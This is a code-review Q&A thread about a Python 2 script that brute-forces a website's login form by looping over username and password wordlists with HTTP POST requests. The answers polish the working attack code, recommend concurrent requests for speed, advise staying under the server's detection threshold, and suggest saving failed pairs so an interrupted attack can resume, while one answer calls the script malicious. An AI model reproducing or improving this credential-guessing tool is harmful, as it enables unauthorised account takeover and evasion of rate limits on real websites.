# Try every username and password from a list on a website

Tags: python, http, authentication

This code will be brute force specific site using http POST method.

```
 def BruteForce(url, username, password):
        userfile = open(username, "r")
        userlist = userfile.read()
        userlist = userlist.split("\n")

        passfile = open(password, "r")
        passlist = passfile.read()
        passlist = passlist.split("\n")

        for i in userlist:
            for j in passlist:
                data = {"username":i, "password": j}
                data2 = {"username":i, "password": j}
                data = urllib.urlencode(data)
                request = urllib2.Request(url, data)

                response = urllib2.urlopen(request)
                payload = response.read()

                isconnect = "True"
                if(payload.find(isconnect)>=0):
                    print "Found, the password is: " + data2["password"] + " and the username is: " + data2["username"]
                    return 

                else:
                    pass
```

Is this code efficient?
How I can improve my code?
Should I use multithreading mechanism to speed up my script?

Comment: It's probably a good idea to `close()` your files explicitly.

Answer (score 4, accepted):

First, improving the code:

1. Reading lines from a file is as easy as `open(name, 'r').readlines()`. No need for three lines where one is enough.
2. `data` and `data2`, are on the face of it redundant (and are badly named). The redundancy is only resolved because you reuse `data` – not a good idea. Use proper variable naming and use *new* variables for a new purpose, don’t reuse variables.

   (And in general, choose more relevant names.)
3. If you don’t use the `else` branch in a conditional, don’t write it.
4. Separation of concerns! This method tries to find a way into a website, *not* print stuff to the console. Return the result instead. That way, the function can be properly used.

This leaves us with:

```
def BruteForce(url, userlist_file, passlist_file):
    userlist = open(userlist_file, 'r').readlines()
    passlist = open(passlist_file, 'r').readlines()

    for username in userlist:
        for password in passlist:
            data = { 'username': username, 'password': password }
            encoded = urllib.urlencode(data)
            request = urllib2.Request(url, encoded)
            response = urllib2.urlopen(request)
            payload = response.read()

            isconnect = 'True'
            if(payload.find(isconnect) >= 0):
                return data

    return { } # Nothing found
```

Now to your question:

> Is this code efficient?

Not really. The problem isn’t so much the code in itself, it’s more the fact that HTTP requests are generally quite slow, but the most time is spent waiting for data. If you do them sequentially (and you do), most of the script’s running time is spent *waiting*.

This can be drastically improved by sending several requests concurrently. This doesn’t even need multithreading – you can just open several connections in a loop, and *then* start reading from them. Even better would be to read asynchronously. Unfortunately, urllib doesn’t support this – but [other libraries do](http://asynchttp.sourceforge.net/).

That said, you cannot simply bombard the web server with tons of requests. After all, your script is malicious and you don’t want the web server to notice you. So you need to fly under the radar – send just as many concurrent requests as the server allows without being blocked immediately.

Finding this number is tricky and requires guesswork and a bit of luck. If you are lucky, the server is badly configured and won’t mind lots of connections. If you want to stay on the safe side, stay way low.

I have no idea, nor much interest in, how to engineer such an attack.

Comment: thx! I have learned a lot from your comment!

Comment: There is no asynchttp library documentation :(

Comment: One minor thing. It's usually a good idea to explicitly close your file objects. OP could do this with a `with` bloc however.

Comment: @JoelCornett AttributeError: 'list' object has no attribute 'close'

Answer (score 4):

1.

```
def BruteForce(url, userlist_file, passlist_file):
```

[PEP8](http://www.python.org/dev/peps/pep-0008/#function-names) recommends you to name functions in lowercase/underscore style.

```
def bruteforce(url, userlist_file, passlist_file):
```

2.

```
isconnect = "True"
```

If it's a constant move it out of function, at least out of cycle. Name it UPPERCASE.

```
SUCCESS_RESPONSE = 'True'
```

3.

```
if(payload.find(isconnect)>=0):
```

Python has build-in function `in` for your case which returns True/False. Brackets are also redundant.

```
if SUCCESS_RESPONSE in payload:
```

4.

You don't check exceptions that are very likely when you send HTTP requests. In this case your script stop and you have to attack server from the beginning. I also advise you to close connections. With-statement does it automatically.

```
from contextlib import closing

try:
    with closing(urllib2.urlopen(request)) as response:    
        payload = response.read()
except urllib2.URLError, e:
    print e
```

You can store wrong login-passwords pairs to skip them when you run your code next time.